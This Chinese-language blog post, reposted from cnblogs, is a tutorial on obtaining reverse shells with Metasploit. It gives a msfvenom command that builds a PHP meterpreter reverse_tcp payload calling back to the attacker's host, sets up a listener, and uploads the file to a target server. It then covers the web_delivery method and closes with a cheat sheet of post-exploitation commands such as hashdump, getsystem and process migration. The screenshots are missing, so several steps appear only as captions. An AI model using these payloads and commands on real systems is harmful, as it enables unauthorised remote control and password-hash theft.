天天看點

msf反彈shell

今天回顧了一下msf反彈shell的操作,在這裡做一下記錄和分享。( ̄︶ ̄)↗

反彈shell的兩種方法

msf反彈shell

 第一種Msfvenom執行個體:

1、msfconsole    #啟動msf

2、msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php    #生成反彈shell檔案

LHOST表示本地攻擊機的ip, LPORT表示本地攻擊機的端口。

其他msf下的各種生成payload指令可參考:https://www.cnblogs.com/backlion/p/6000544.html

msf反彈shell

這樣我們就成功生成了一個shell.php檔案。

3、接下來我們需要在本機中監聽4444端口。

msf反彈shell
msf反彈shell
msf反彈shell

這就表示開始本機開始監聽4444端口了。

4、現在把shell.php檔案通過菜刀上傳至目标伺服器中,然後本地遊覽器通路shell.php

msf反彈shell
 即可以看見成功傳回了一個session
msf反彈shell
sessions -i     #檢視目前可用會話
msf反彈shell
msf反彈shell

 第二種web_delivery執行個體流程:

 1、msfconsole    #啟動msf
msf反彈shell

2、show options    #目的是看exploit target為什麼腳本

這裡預設為pyhton,需要更改為php

msf反彈shell
msf反彈shell
show payloads    #挑選payload,選擇php/meterpreter/reverse_tcp
msf反彈shell
然後設定lhost
msf反彈shell
msf反彈shell
得到一段腳本,将這段腳本在目标機的powershell中執行即可反彈shell。

下面貼一些常用的指令:

基礎指令: seach cve-2017-7494                            #檢視是否存在指定漏洞 use exploit/multi/handler                        #使用exploit/multi/handler子產品 info                                                         #檢視資訊 show options                  #檢視exp的參數  rhost 是遠端主機位址  lhost是本地主機位址 back                                                       #傳回上一級 session -i                                                #檢視目前可用會話 sessions -i x                                           #切換至會話x session -k                                               #殺死所有活躍會話 background                                            #将會話放到背景 route                     #檢視被控主機路由表 sysinfo                       #檢視系統資訊 run post/windows/gather/checkvm         #檢查是否在虛拟機上運作 idletime                    #檢視運作時間 getuid                                              #獲得運作Meterpreter會話的使用者名,進而檢視目前會話具有的權限 getsystem                                         #通過各種攻擊向量來提升到系統使用者權限 getwd pwd                                        #shell處于靶機的目錄 getlwd                                               #本地的目錄位置 hashdump                                         #導出目标主機中的密碼哈希值 screenshot                                       #對目标主機的螢幕進行截圖 backgroud                                        #将目前Meterpreter shell轉為背景執行 quit                                                  #關閉目前Meterpreter會話,傳回MSF終端     ps                                                       #顯示所有運作程序以及管聯的使用者賬戶 migrate PID                                      #遷移到一個指定的程序PID post/windows/manage/migrate                                  #會自動尋找合适的程序進行遷移 execute -f cmd.exe -i                       #執行cmd.exe指令并進行互動 shell                                                    #以所有可用令牌來運作一個互動的shell

轉載于:https://www.cnblogs.com/HKCZ/p/10870029.html